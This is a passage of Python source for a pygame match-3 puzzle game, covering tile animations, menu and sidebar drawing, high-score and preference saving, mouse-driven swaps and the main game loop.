self.screen_surf.fill(self.background_color[\"screen\"])\n self.game_surf.fill(self.background_color[\"game\"])\n self.draw_sidebar()\n win_points = [self.board_pos_to_win_pos(*p) for p in board_points]\n\n self.draw_board(no_draw_pts=board_points)\n\n curr_ani_time = pygame.time.get_ticks() - ani_time_start\n\n # Calculate the new size and the new transparency\n curr_transparency = int(target_transparency * (1 - curr_ani_time / clear_ani_time))\n if curr_transparency > target_transparency:\n curr_transparency = target_transparency\n curr_size = int(self.circle_radius * (1 - curr_ani_time / clear_ani_time))\n if curr_size < target_size:\n curr_size = target_size\n\n # Draw the moving circles\n for i, p in enumerate(board_points):\n color_index = self.board.board[p[1]][p[0]]\n if color_index < 0:\n continue\n self.draw_circle(win_points[i][0], win_points[i][1], self.colors[color_index], curr_size)\n\n if no_more_moves:\n texts = (\"NO MORE MOVES\", \"REGENERATING BOARD\")\n width = (max([len(text) for text in texts]) + 4) * self.char_width\n height = (math.ceil(self.char_height) + math.ceil(self.char_sep_height)) * 2\n x = (self.board_surf.get_width() - width) / 2 + self.board_surf.get_abs_offset()[0]\n y = (self.board_surf.get_height() - height * 2) / 2 + self.board_surf.get_abs_offset()[1]\n for text in texts:\n button = pygamew.Button(\n self.screen_surf, x, y, width, height,\n text=text,\n textColour=(32, 255, 32),\n font=self.font,\n colour=self.background_color[\"game\"],\n hoverColour=self.background_color[\"game\"],\n pressedColour=self.background_color[\"game\"]\n )\n button.draw()\n y += height\n\n pygame.display.flip()\n\n def animate_shift_down(self, shifted_bp: list[tuple[int, int]], num_vertical_points: int) -> None:\n board_points_dst = shifted_bp\n board_points_src = [(x, y - 1) for (x, y) in board_points_dst]\n win_points_dst = [list(self.board_pos_to_win_pos(*p)) for p in board_points_dst]\n win_points_src = [list(self.board_pos_to_win_pos(*p)) for p in board_points_src]\n color_indices = [self.board.board[y][x] for (x, y) in board_points_dst]\n\n curr_pos = [[x, y] for (x, y) in win_points_src]\n\n ani_time = self.shift_down_ani_time / min((num_vertical_points, 2))\n curr_ani_time = 0\n ani_time_start = pygame.time.get_ticks()\n\n while any([curr_pos[i] != win_points_dst[i] for i in range(len(curr_pos))]):\n if self.process_events():\n self.screen_surf.fill(self.background_color[\"screen\"])\n self.game_surf.fill(self.background_color[\"game\"])\n self.draw_sidebar()\n win_points_dst = [list(self.board_pos_to_win_pos(*p)) for p in board_points_dst]\n win_points_src = [list(self.board_pos_to_win_pos(*p)) for p in board_points_src]\n\n self.draw_board(no_draw_pts=board_points_src + board_points_dst)\n\n curr_ani_time = pygame.time.get_ticks() - ani_time_start\n\n for p_i in range(len(curr_pos)):\n # Calculate the new position\n src_pos = win_points_src[p_i]\n dst_pos = win_points_dst[p_i]\n target_dist = ((dst_pos[0] - src_pos[0]), (dst_pos[1] - src_pos[1]))\n curr_dist = (target_dist[0] * curr_ani_time / ani_time, target_dist[1] * curr_ani_time / ani_time)\n curr_pos[p_i] = [src_pos[0] + curr_dist[0], src_pos[1] + curr_dist[1]]\n curr_pos[p_i] = [int(curr_pos[p_i][0]), int(curr_pos[p_i][1])]\n for i in range(2):\n dir = dst_pos[i] - src_pos[i]\n if (dir < 0 and curr_pos[p_i][i] < dst_pos[i]) or (dir > 0 and curr_pos[p_i][i] > dst_pos[i]):\n curr_pos[p_i][i] = dst_pos[i]\n # Draw the moving circles\n color_index = color_indices[p_i]\n if color_index < 0:\n continue\n self.draw_circle(curr_pos[p_i][0], curr_pos[p_i][1], self.colors[color_index])\n\n pygame.display.flip()\n\n def animate_hint(self, board_point1: tuple[int, int], board_point2: tuple[int, int]) -> None:\n self.play_sound(\"hint\")\n\n board_points = (board_point1, board_point2)\n win_points = (list(self.board_pos_to_win_pos(*board_points[0])), list(self.board_pos_to_win_pos(*board_points[1])))\n\n curr_ani_time = 0\n ani_time_start = pygame.time.get_ticks()\n\n while curr_ani_time <= self.hint_ani_time:\n if self.process_events():\n self.screen_surf.fill(self.background_color[\"screen\"])\n self.game_surf.fill(self.background_color[\"game\"])\n self.draw_sidebar()\n win_points = (list(self.board_pos_to_win_pos(*board_points[0])), list(self.board_pos_to_win_pos(*board_points[1])))\n\n self.draw_board(no_draw_pts=board_points)\n\n curr_ani_time = pygame.time.get_ticks() - ani_time_start\n\n for p_i in range(2):\n color_index = self.board.board[board_points[p_i][1]][board_points[p_i][0]]\n if color_index < 0:\n continue\n self.draw_circle(*win_points[p_i], self.hint_color, self.circle_radius / self.circle_scale)\n self.draw_circle(*win_points[p_i], self.colors[color_index])\n\n pygame.display.flip()\n\n self.update_board()\n\n def animate_plus_score_prev(self) -> None:\n self.curr_plus_score_ani_time = self.plus_score_ani_time + 1\n self.update_sidebar()\n pygame.time.wait(self.plus_score_blink_ani_time)\n\n def animate_plus_score_post(self) -> None:\n self.curr_plus_score_ani_time = 0\n self.plus_score_ani_time_start = pygame.time.get_ticks()\n self.update_sidebar()\n\n ##################################################\n # Draw functions\n ##################################################\n\n def draw_circle(self, x, y, color, radius = None) -> None:\n if radius is None:\n radius = self.circle_radius\n if color != (0, 0, 0):\n gfxdraw.aacircle(self.board_surf, x, y, int(radius * self.circle_scale), color)\n gfxdraw.filled_circle(self.board_surf, x, y, int(radius * self.circle_scale), color)\n else:\n gfxdraw.aacircle(self.board_surf, x, y, int(radius * self.circle_scale), self.border_color)\n gfxdraw.filled_circle(self.board_surf, x, y, int(radius * self.circle_scale), self.border_color)\n gfxdraw.aacircle(self.board_surf, x, y, int(radius * (1 - (1 - self.circle_scale) * 2)), color)\n gfxdraw.filled_circle(self.board_surf, x, y, int(radius * (1 - (1 - self.circle_scale) * 2)), color)\n\n def draw_board(self, no_draw_pts: list[tuple[int, int]] = None) -> None:\n self.board_surf.fill(self.background_color[\"board\"])\n\n for row in range(self.board.rows):\n for col in range(self.board.cols):\n if no_draw_pts is not None and (col, row) in no_draw_pts:\n continue\n color_index = self.board.board[row][col]\n if color_index < 0:\n continue\n pos = self.board_pos_to_win_pos(col, row)\n self.draw_circle(pos[0], pos[1], self.colors[color_index])\n\n def draw_buttons(self, texts, y, y_separation, surface_name) -> None:\n surface = getattr(self, f\"{surface_name}_surf\")\n height = (self.char_height + self.char_sep_height) * 2\n for text in texts:\n width = (len(text) + 4) * self.char_width\n x = (surface.get_width() - width) / 2 + surface.get_abs_offset()[0]\n y_abs = y + surface.get_abs_offset()[1]\n border_thickness = int(2 * self.game_surf.get_width() / self.starting_width)\n if border_thickness < 1:\n border_thickness = 1\n button_name = text.lower()\n button_name = button_name.replace(' ', '_')\n if button_name not in self.active_widgets:\n button = pygamew.Button(\n self.screen_surf, x, y_abs, width, height,\n text=text,\n textColour=self.widget_text_color,\n font=self.font,\n colour=(64, 64, 64),\n hoverColour=(96, 96, 96),\n pressedColour=(128, 128, 128),\n borderColour=(0, 0, 0),\n hoverBorderColour=(32, 32, 32),\n pressedBorderColour=(64, 64, 64),\n shadowColour=[val * 2 / 3 for val in self.background_color[surface_name]],\n shadowDistance=self.char_sep_height // 2,\n borderThickness=border_thickness,\n onRelease=getattr(self, f\"{button_name}_clicked\")\n )\n self.active_widgets[button_name] = button\n self.active_widgets[button_name].draw()\n y += height + (self.char_height + self.char_sep_height) * y_separation\n\n def draw_sidebar(self) -> None:\n self.sidebar_surf.fill(self.background_color[\"sidebar\"])\n\n y = (self.sidebar_surf.get_height() - (self.char_height + self.char_sep_height) * 13) / 2\n for i, text in enumerate((\"SCORE\", str(self.score), \"TIME LEFT\", str(self.time_left_sec))):\n if i == 2:\n y += self.char_height + self.char_sep_height\n if i == 3:\n tc = list(self.widget_text_color)\n gb = 255 * self.time_left_sec / (self.time_init / 1000)\n if gb > 255:\n gb = 255\n elif gb < 0:\n gb = 0\n tc[1] = gb\n tc[2] = gb\n label = self.font.render(text, True, tc)\n else:\n label = self.font.render(text, True, self.widget_text_color)\n width = len(text) * self.char_width\n x = (self.sidebar_surf.get_width() - width) / 2\n self.sidebar_surf.blit(label, (x, y))\n if self.curr_plus_score_ani_time <= self.plus_score_ani_time:\n if i == 1 or i == 3:\n label = self.font.render(\"+\" + str({1: self.curr_score, 3: self.curr_time_score / 1000}.get(i)), True, (255, 255, 0))\n x += width\n self.sidebar_surf.blit(label, (x, y))\n self.curr_plus_score_ani_time = pygame.time.get_ticks() - self.plus_score_ani_time_start\n y += self.char_height + self.char_sep_height\n\n y += (self.char_height + self.char_sep_height) * 3\n\n texts = (\"PAUSE\", \"HINT\")\n self.draw_buttons(texts, y, 1, \"sidebar\")\n\n def draw_main_menu(self) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n texts = [\"NEW GAME\", \"HIGH SCORES\", \"PREFERENCES\", \"ABOUT\", \"EXIT\"]\n if self.game_state == GameState.PAUSED:\n texts = [\"RESUME GAME\"] + texts\n y = (self.game_surf.get_height() - len(texts) * (self.char_height + self.char_sep_height) * 3.5 + (self.char_height + self.char_sep_height) * 1.5) / 2\n self.draw_buttons(texts, y, 1.5, \"game\")\n\n def draw_choosesize(self) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n y = (self.game_surf.get_height() - (self.char_height + self.char_sep_height) * 2) / 2\n texts = (\"START\",)\n self.draw_buttons(texts, y, 0, \"game\")\n\n y = (self.game_surf.get_height() - (len(self.board_sizes) + 1) * (self.char_height + self.char_sep_height) * 2) / 2\n text = \"Choose Board Size\"\n height = (self.char_height + self.char_sep_height) * 2\n width = (len(text) + 4) * self.char_width\n x = (self.game_surf.get_width() - width) / 2 + self.game_surf.get_abs_offset()[0]\n y_abs = y + self.game_surf.get_abs_offset()[1]\n border_thickness = int(2 * self.game_surf.get_width() / self.starting_width)\n if border_thickness < 1:\n border_thickness = 1\n dropdown_name = text.lower()\n dropdown_name = dropdown_name.replace(' ', '_')\n if dropdown_name not in self.active_widgets:\n dropdown = pygamew.Dropdown(\n self.screen_surf, x, y_abs, width, height,\n name=text,\n textColour=self.widget_text_color,\n font=self.font,\n inactiveColour=(64, 64, 64),\n hoverColour=(96, 96, 96),\n pressedColour=(128, 128, 128),\n borderColour=(0, 0, 0),\n hoverBorderColour=(32, 32, 32),\n pressedBorderColour=(64, 64, 64),\n borderThickness=border_thickness,\n choices=[f\"{n}x{n}\" for n in self.board_sizes],\n values=self.board_sizes\n )\n self.active_widgets[dropdown_name] = dropdown\n # FIXME: When window is resized dropdown is regenerated and loses its current selection.\n self.active_widgets[dropdown_name].draw()\n\n def draw_ended(self) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n y = (self.game_surf.get_height() - (self.char_height + self.char_sep_height) * 9) / 2\n for i, text in enumerate((\"TIME'S UP!\", \"YOUR SCORE:\", str(self.score))):\n width = len(text) * self.char_width\n x = (self.game_surf.get_width() - width) / 2\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x, y))\n y += (self.char_height + self.char_sep_height)\n if i == 0:\n y += (self.char_height + self.char_sep_height) * 2\n\n y += (self.char_height + self.char_sep_height) * 2\n\n texts = (\"CONTINUE\",)\n self.draw_buttons(texts, y, 0, \"game\")\n\n def draw_enterhighscore(self ) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n y = (self.game_surf.get_height() - (self.char_height + self.char_sep_height) * 11) / 2\n text = \"HIGH SCORE ACHIEVED!\"\n width = len(text) * self.char_width\n x = (self.game_surf.get_width() - width) / 2\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x, y))\n\n y += (self.char_height + self.char_sep_height) * 3\n\n text = \"Enter your name:\"\n width = len(text) * self.char_width\n x = (self.game_surf.get_width() - width) / 2\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x, y))\n\n y += (self.char_height + self.char_sep_height) * 2\n\n width = (self.high_score_name_max_len + 1) * self.char_width\n height = (self.char_height + self.char_sep_height) * 2\n x = (self.game_surf.get_width() - width) / 2 + self.game_surf.get_abs_offset()[0]\n y_abs = y + self.game_surf.get_abs_offset()[1]\n border_thickness = int(2 * self.game_surf.get_width() / self.starting_width)\n if border_thickness < 1:\n border_thickness = 1\n textbox_name = \"high_score_name\"\n if textbox_name not in self.active_widgets:\n textbox = pygamew.TextBox(\n self.screen_surf, x, y_abs, width, height,\n textColour=self.widget_text_color,\n font=self.font,\n colour=(64, 64, 64),\n borderColour=(0, 0, 0),\n borderThickness=border_thickness,\n placeholderText=\"Enter your name\",\n onSubmit=self.ok_clicked\n )\n self.active_widgets[textbox_name] = textbox\n self.active_widgets[textbox_name].draw()\n\n y += (self.char_height + self.char_sep_height) * 4\n\n texts = (\"OK\",)\n self.draw_buttons(texts, y, 0, \"game\")\n\n def draw_highscores(self) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n hsss = f\"{self.high_scores_state}x{self.high_scores_state}\"\n\n y = (self.game_surf.get_height() - (self.char_height + self.char_sep_height) * 15) / 2\n for text in (\"HIGH SCORES\", hsss, f\"Rank Name{' '*(self.high_score_name_max_len-4)} Score\"):\n width = len(text) * self.char_width\n x = (self.game_surf.get_width() - width) / 2\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x, y))\n y += (self.char_height + self.char_sep_height) * 2\n\n for i in range(5):\n if hsss in self.high_scores and i < len(self.high_scores[hsss]):\n cols = (\n f\"{i+1:>4}\",\n f\"{self.high_scores[hsss][i][0]}{' '*(self.high_score_name_max_len-len(self.high_scores[hsss][i][0]))}\",\n f\"{self.high_scores[hsss][i][1]:>5}\"\n )\n text = f\"{cols[0]} {cols[1]} {cols[2]}\"\n width = len(text) * self.char_width\n x = (self.game_surf.get_width() - width) / 2\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x, y))\n y += (self.char_height + self.char_sep_height)\n\n y += (self.char_height + self.char_sep_height) * 2\n\n texts = (\"BACK\",)\n self.draw_buttons(texts, y, 0, \"game\")\n\n for i, text in enumerate((\"<\", \">\")):\n width = (len(text) + 2) * self.char_width\n height = (self.char_height + self.char_sep_height) * 5\n x = {0: self.char_width, 1: self.game_surf.get_width() - width - self.char_width}.get(i) + self.game_surf.get_abs_offset()[0]\n y = (self.game_surf.get_height() - height) / 2\n y_abs = y + self.game_surf.get_abs_offset()[1]\n border_thickness = int(2 * self.game_surf.get_width() / self.starting_width)\n if border_thickness < 1:\n border_thickness = 1\n button_name = {0: \"left\", 1: \"right\"}.get(i)\n if button_name not in self.active_widgets:\n button = pygamew.Button(\n self.screen_surf, x, y_abs, width, height,\n text=text,\n textColour=self.widget_text_color,\n font=self.font,\n colour=(64, 64, 64),\n hoverColour=(96, 96, 96),\n pressedColour=(128, 128, 128),\n borderColour=(0, 0, 0),\n hoverBorderColour=(32, 32, 32),\n pressedBorderColour=(64, 64, 64),\n shadowColour=[val * 2 / 3 for val in self.background_color[\"game\"]],\n shadowDistance=self.char_sep_height // 2,\n borderThickness=border_thickness,\n onRelease=getattr(self, f\"{button_name}_clicked\")\n )\n self.active_widgets[button_name] = button\n self.active_widgets[button_name].draw()\n\n def draw_preferences(self) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n y = (self.game_surf.get_height() - (self.char_height + self.char_sep_height) * 12) / 2\n height = self.char_height + self.char_sep_height\n texts = (\"Background music\", \"Sound effects\")\n text_width = max([len(text) for text in texts]) * self.char_width\n spacing_width = 3 * self.char_width\n toggle_width = 3 * self.char_width\n width = text_width + spacing_width + toggle_width\n x_text = (self.game_surf.get_width() - width) / 2\n x_toggle = x_text + text_width + spacing_width\n x_toggle_abs = x_toggle + self.game_surf.get_abs_offset()[0]\n for text in texts:\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x_text, y))\n y_abs = y + self.game_surf.get_abs_offset()[1]\n toggle_name = text.lower()\n toggle_name = toggle_name.replace(' ', '_')\n if toggle_name not in self.active_widgets:\n toggle = pygamew.Toggle(\n self.screen_surf, int(x_toggle_abs), int(y_abs), int(toggle_width), int(height),\n startOn = self.preferences.get(toggle_name, True),\n onColour = (0, 255, 0),\n offColour = (128, 128, 128),\n handleOnColour = (0, 128, 0),\n handleOffColour = (64, 64, 64)\n )\n self.active_widgets[toggle_name] = toggle\n self.active_widgets[toggle_name].draw()\n y += (self.char_height + self.char_sep_height) * 3\n\n y += (self.char_height + self.char_sep_height) * 4\n\n texts = (\"SAVE\",)\n self.draw_buttons(texts, y, 0, \"game\")\n\n def draw_about(self) -> None:\n self.game_surf.fill(self.background_color[\"game\"])\n\n y = (self.game_surf.get_height() - (self.char_height + self.char_sep_height) * 10) / 2\n for text in (\"MATCH3PY\", \"AUTHOR: TOMAS GONZALEZ ARAGON\"):\n width = len(text) * self.char_width\n x = (self.game_surf.get_width() - width) / 2\n label = self.font.render(text, True, self.widget_text_color)\n self.game_surf.blit(label, (x, y))\n y += (self.char_height + self.char_sep_height) * 4\n\n texts = (\"BACK\",)\n self.draw_buttons(texts, y, 0, \"game\")\n\n def draw_screen(self) -> None:\n self.screen_surf.fill(self.background_color[\"screen\"])\n\n if self.game_state == GameState.RUNNING:\n self.game_surf.fill(self.background_color[\"game\"])\n self.draw_board()\n self.draw_sidebar()\n elif self.game_state == GameState.MAINMENU or self.game_state == GameState.PAUSED:\n self.draw_main_menu()\n elif self.game_state == GameState.CHOOSESIZE:\n self.draw_choosesize()\n elif self.game_state == GameState.ENDED:\n self.draw_ended()\n elif self.game_state == GameState.ENTERHIGHSCORE:\n self.draw_enterhighscore()\n elif self.game_state == GameState.HIGHSCORES:\n self.draw_highscores()\n elif self.game_state == GameState.PREFERENCES:\n self.draw_preferences()\n elif self.game_state == GameState.ABOUT:\n self.draw_about()\n\n ##################################################\n # Update functions\n ##################################################\n\n def update_board(self) -> None:\n self.draw_board()\n pygame.display.flip()\n\n def update_sidebar(self) -> None:\n self.draw_sidebar()\n pygame.display.flip()\n\n def update_screen(self) -> None:\n self.active_widgets = {}\n self.draw_screen()\n pygame.display.flip()\n\n ##################################################\n # On click functions\n ##################################################\n\n def new_game_clicked(self) -> None:\n self.game_state = GameState.CHOOSESIZE\n self.update_screen()\n\n def start_clicked(self) -> None:\n size = self.active_widgets[\"choose_board_size\"].getSelected()\n if size is None:\n return\n num_values = size - 1\n if size > 7:\n num_values -= 1\n if size > 10:\n num_values -= 1\n self.board = Match3Board(size, size, num_values)\n self.score = 0\n self.time_left = self.time_init\n self.time_score = 0\n self.time_left_sec = int(self.time_left / 1000)\n self.hint = False\n self.hint_cut_score = False\n self.plus_score_ani_time_start = 0\n self.curr_plus_score_ani_time = self.plus_score_ani_time + 1\n self.curr_score = 0\n self.curr_time_score = 0\n self.time_paused = 0\n self.pause = False\n self.game_state = GameState.RUNNING\n self.start_music()\n self.resize_surfaces()\n self.update_screen()\n self.time_start = pygame.time.get_ticks()\n\n def hint_clicked(self) -> None:\n self.hint = True\n\n def pause_clicked(self) -> None:\n self.pause = True\n\n def resume_game_clicked(self) -> None:\n self.game_state = GameState.RUNNING\n self.start_music()\n self.update_screen()\n self.time_paused += pygame.time.get_ticks() - self.pause_time\n\n def continue_clicked(self) -> None:\n min_hs = 0\n hs = self.high_scores.get(f\"{self.board.cols}x{self.board.rows}\", list())\n if len(hs) > 0:\n min_hs = min([ns[1] for ns in hs])\n if self.score > 0 and (self.score > min_hs or len(hs) < 5):\n self.game_state = GameState.ENTERHIGHSCORE\n self.play_sound(\"yay\")\n else:\n self.game_state = GameState.MAINMENU\n self.update_screen()\n\n def ok_clicked(self) -> None:\n name = self.active_widgets[\"high_score_name\"].getText()\n # TODO: Sanitize name.\n if len(name) == 0:\n return\n hs = self.high_scores.get(f\"{self.board.cols}x{self.board.rows}\", list())\n hs.append([name, self.score])\n hs.sort(key=lambda d: d[1], reverse=True)\n if len(hs) > 5:\n del hs[-1]\n self.high_scores[f\"{self.board.cols}x{self.board.rows}\"] = hs\n with open(self.high_scores_filename, 'w') as f:\n json.dump(self.high_scores, f)\n self.game_state = GameState.MAINMENU\n self.update_screen()\n\n def high_scores_clicked(self) -> None:\n self.prev_state = self.game_state\n self.game_state = GameState.HIGHSCORES\n self.update_screen()\n\n def left_clicked(self) -> None:\n self.high_scores_state -= 1\n if self.high_scores_state < self.board_sizes[0]:\n self.high_scores_state = self.board_sizes[0]\n self.update_screen()\n\n def right_clicked(self) -> None:\n self.high_scores_state += 1\n if self.high_scores_state > self.board_sizes[-1]:\n self.high_scores_state = self.board_sizes[-1]\n self.update_screen()\n\n def preferences_clicked(self) -> None:\n self.prev_state = self.game_state\n self.game_state = GameState.PREFERENCES\n self.update_screen()\n\n def save_clicked(self) -> None:\n for s in (\"background_music\", \"sound_effects\"):\n self.preferences[s] = self.active_widgets[s].value\n with open(self.preferences_filename, 'w') as f:\n json.dump(self.preferences, f)\n self.game_state = self.prev_state\n self.update_screen()\n\n def about_clicked(self) -> None:\n self.prev_state = self.game_state\n self.game_state = GameState.ABOUT\n self.update_screen()\n\n def back_clicked(self) -> None:\n self.game_state = self.prev_state\n self.update_screen()\n\n def exit_clicked(self) -> None:\n pygame.quit()\n exit()\n\n ##################################################\n # Helper functions\n ##################################################\n\n def win_pos_to_board_pos(self, win_pos_x: int, win_pos_y: int, relative_to_window: bool = False) -> tuple[int, int]:\n if relative_to_window:\n win_pos_x -= self.board_surf.get_abs_offset()[0]\n win_pos_y -= self.board_surf.get_abs_offset()[1]\n col_w = self.board_surf.get_width() / self.board.cols\n row_h = self.board_surf.get_height() / self.board.rows\n board_pos_x = (win_pos_x - col_w / 2) / col_w\n board_pos_y = (win_pos_y - row_h / 2) / row_h\n return (int(round(board_pos_x)), int(round(board_pos_y)))\n\n def board_pos_to_win_pos(self, board_pos_x: int, board_pos_y: int, relative_to_window: bool = False) -> tuple[int, int]:\n col_w = self.board_surf.get_width() / self.board.cols\n row_h = self.board_surf.get_height() / self.board.rows\n win_pos_x = board_pos_x * col_w + col_w / 2\n win_pos_y = board_pos_y * row_h + row_h / 2\n if relative_to_window:\n win_pos_x += self.board_surf.get_abs_offset()[0]\n win_pos_y += self.board_surf.get_abs_offset()[1]\n return (int(win_pos_x), int(win_pos_y))\n\n def point_inside_circle(self, point: tuple[int, int], circle_center: tuple[int, int], r: float) -> bool:\n x, y = point\n c_x, c_y = circle_center\n return (x - c_x)**2 + (y - c_y)**2 < r**2\n\n def get_num_vertical_points(self, points: list[tuple[int, int]]) -> int:\n points_in_line = dict()\n for (col, _) in points:\n points_in_line[col] = points_in_line.get(col, 0) + 1\n return max(points_in_line.values())\n\n def play_sound(self, sound: str) -> None:\n if self.preferences.get(\"sound_effects\", True) and sound in self.sounds:\n pygame.mixer.Sound.play(self.sounds[sound])\n\n def start_music(self) -> None:\n if self.preferences.get(\"background_music\", True):\n try:\n pygame.mixer.music.play(-1, 0, 1000)\n except:\n pass\n\n ##################################################\n # Other functions\n ##################################################\n\n def resize_surfaces(self) -> None:\n # Calculate new screen size\n sw, sh = self.screen_surf.get_size()\n gw, gh = sw, sh\n gx, gy = 0, 0\n if sw / sh > self.game_ratio:\n gw = sh * self.game_ratio\n gx = (sw - gw) / 2\n else:\n gh = sw / self.game_ratio\n gy = (sh - gh) / 2\n self.game_surf = self.screen_surf.subsurface((gx, gy, gw, gh))\n # Calculate and update new board size and new circle radius\n pos = gh * (1 - self.board_scale) / 2\n side = gh * self.board_scale\n self.board_surf = self.game_surf.subsurface((pos, pos, side, side))\n if self.board is not None:\n self.circle_radius = self.board_surf.get_height() / self.board.cols / 2\n # Calculate and update new sidebar size\n self.sidebar_surf = self.game_surf.subsurface((gh, 0, gw - gh, gh))\n # Calculate and update new font size\n self.font_size = self.min_font_size * self.game_surf.get_width() / self.starting_width\n self.char_width = self.min_char_width * self.game_surf.get_width() / self.starting_width\n self.char_height = self.min_char_height * self.game_surf.get_height() / self.starting_height\n self.char_sep_height = self.min_char_sep_height * self.game_surf.get_height() / self.starting_height\n self.font = pygame.font.SysFont(\"monospace\", int(self.font_size))\n self.font.set_bold(True)\n # Clear active widgets to force a re-draw\n self.active_widgets = {}\n\n ##################################################\n # Process events functions\n ##################################################\n\n def choosesize_process_events(self, events, **kwargs) -> bool:\n self.active_widgets[\"choose_board_size\"].listen(events)\n self.draw_choosesize()\n if self.active_widgets[\"choose_board_size\"].dropped:\n self.active_widgets[\"start\"].hide()\n else:\n self.active_widgets[\"start\"].show()\n return True\n\n def running_process_events(self, events, **kwargs) -> bool:\n # End the game if the time has run out\n if self.time_left <= 0:\n self.game_ended = True\n\n update_display = False\n\n # Update the time left\n self.time_left = self.time_paused + self.time_init + self.time_score - (pygame.time.get_ticks() - self.time_start)\n if self.time_left_sec != int(round(self.time_left / 1000)):\n self.time_left_sec = int(round(self.time_left / 1000))\n if self.time_left_sec < 0:\n self.time_left_sec = 0\n self.draw_sidebar()\n update_display = True\n\n # Play beep sound\n if self.time_left_sec <= 5:\n if pygame.time.get_ticks() - self.last_beep_sound_time >= 1000:\n self.last_beep_sound_time = pygame.time.get_ticks()\n self.play_sound(\"beep\")\n\n # Remove plus score from sidebar if the ani time is up\n if self.curr_plus_score_ani_time <= self.plus_score_ani_time:\n self.curr_plus_score_ani_time = pygame.time.get_ticks() - self.plus_score_ani_time_start\n if self.curr_plus_score_ani_time > self.plus_score_ani_time:\n self.draw_sidebar()\n update_display = True\n\n # Process events\n if not kwargs.get('mouse', False):\n return\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button != 1:\n continue\n if self.mouse_state == MouseState.WAITING:\n self.board_pos_src = self.win_pos_to_board_pos(*event.pos, True)\n if self.board.out_of_bounds(*self.board_pos_src):\n continue\n # Check that the mouse is inside a circle\n circle_center = self.board_pos_to_win_pos(*self.board_pos_src, True)\n pic = self.point_inside_circle(event.pos, circle_center, self.circle_radius * self.circle_scale)\n if pic:\n self.mouse_state = MouseState.PRESSED\n elif event.type == pygame.MOUSEMOTION:\n if self.mouse_state == MouseState.PRESSED:\n self.mouse_state = MouseState.MOVING\n if self.mouse_state == MouseState.MOVING:\n board_pos_dst = list(self.win_pos_to_board_pos(*event.pos, True))\n # Check that the mouse was dragged to a different position in the board\n if list(self.board_pos_src) == board_pos_dst:\n continue\n # If the mouse went to far, move the dst pos back to a neighbor\n for i in range(2):\n if self.board_pos_src[i] - board_pos_dst[i] > 1:\n board_pos_dst[i] = self.board_pos_src[i] - 1\n elif self.board_pos_src[i] - board_pos_dst[i] < -1:\n board_pos_dst[i] = self.board_pos_src[i] + 1\n if self.board.out_of_bounds(*board_pos_dst):\n continue\n # Check that the new position is a neighbor\n swap_valid = False\n for (x, y) in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n neigh_x = self.board_pos_src[0] + x\n neigh_y = self.board_pos_src[1] + y\n if [neigh_x, neigh_y] == board_pos_dst:\n swap_valid = True\n break\n if not swap_valid:\n self.mouse_state = MouseState.WAITING\n continue\n # Do the swap, if it was not a valid play, revert it\n swap_valid = self.board.is_swap_valid(self.board_pos_src, board_pos_dst)\n self.animate_swap(self.board_pos_src, tuple(board_pos_dst))\n self.board.swap(self.board_pos_src, board_pos_dst)\n if not swap_valid:\n self.animate_swap(tuple(board_pos_dst), self.board_pos_src)\n self.board.swap(board_pos_dst, self.board_pos_src)\n self.mouse_state = MouseState.WAITING\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button != 1:\n continue\n if self.mouse_state == MouseState.PRESSED:\n self.mouse_state = MouseState.WAITING\n elif self.mouse_state == MouseState.MOVING:\n self.mouse_state = MouseState.WAITING\n\n return update_display\n\n def enterhighscore_process_events(self, events, **kwargs) -> bool:\n self.active_widgets[\"high_score_name\"].listen(events)\n self.draw_screen()\n return True\n\n def preferences_process_events(self, events, **kwargs) -> bool:\n self.active_widgets[\"background_music\"].listen(events)\n self.active_widgets[\"sound_effects\"].listen(events)\n self.draw_screen()\n return True\n\n def process_events(self, fps: int = -1, **kwargs) -> bool:\n # Wait until frame time\n if fps < 0:\n fps = self.ani_fps\n self.clock.tick(fps)\n\n # Process generic events\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.VIDEORESIZE:\n self.resize_surfaces()\n return True\n elif event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # Process specific events related to the current game state\n gs = self.game_state.name\n gs = gs.lower()\n try:\n func = getattr(self, f\"{gs}_process_events\")\n except AttributeError:\n func = None\n update_display = False\n if func is not None:\n update_display = func(events, **kwargs)\n\n # Listen to button events\n for button in self.active_widgets.values():\n if type(button) == pygamew.Button:\n color = button.colour\n button.listen(events)\n if color != button.colour:\n button.draw()\n update_display = True\n\n if update_display:\n pygame.display.flip()\n\n return False\n\n ##################################################\n # Main game loop functions\n ##################################################\n\n def running(self) -> None:\n # Let the computer play (for debug)\n # play = self.board.find_better_play()\n # if len(play) > 0:\n # (swap_points, groups) = play\n # self.animate_swap(swap_points[0], swap_points[1])\n # self.board.swap(swap_points[0], swap_points[1])\n\n # Find all the match3 groups and update the board state by\n # clearing them and then filling the board with new tiles from the top\n # while shifting down the ones floating\n # Do this until the board state is stabilized\n groups = self.board.get_valid_groups()\n bonus_score = 0\n bonus = 0\n while len(groups) > 0:\n # Clear any old plus score in the sidbar\n self.animate_plus_score_prev()\n # Calculate the score from the match3 groups, add extra time poportional to the score\n self.curr_score = self.board.calc_score(groups) + bonus_score\n group_bonus_score = 0\n group_bonus = 0\n for _ in range(len(groups) - 1):\n group_bonus += 1\n group_bonus_score += group_bonus\n self.curr_time_score = ((self.curr_score + bonus_score + group_bonus_score) * 100)\n if self.hint_cut_score:\n self.curr_score //= 2\n self.curr_time_score = self.curr_score * 100\n self.hint_cut_score = False\n self.score += self.curr_score\n self.time_score += self.curr_time_score\n # Show plus score in the sidebar\n self.animate_plus_score_post()\n # Clear the tiles that create a match3 group\n points = [point for group in groups for point in group]\n self.animate_clear(points)\n self.board.clear(points)\n # Shift down the tiles that are floating and create new tiles in the top row\n # 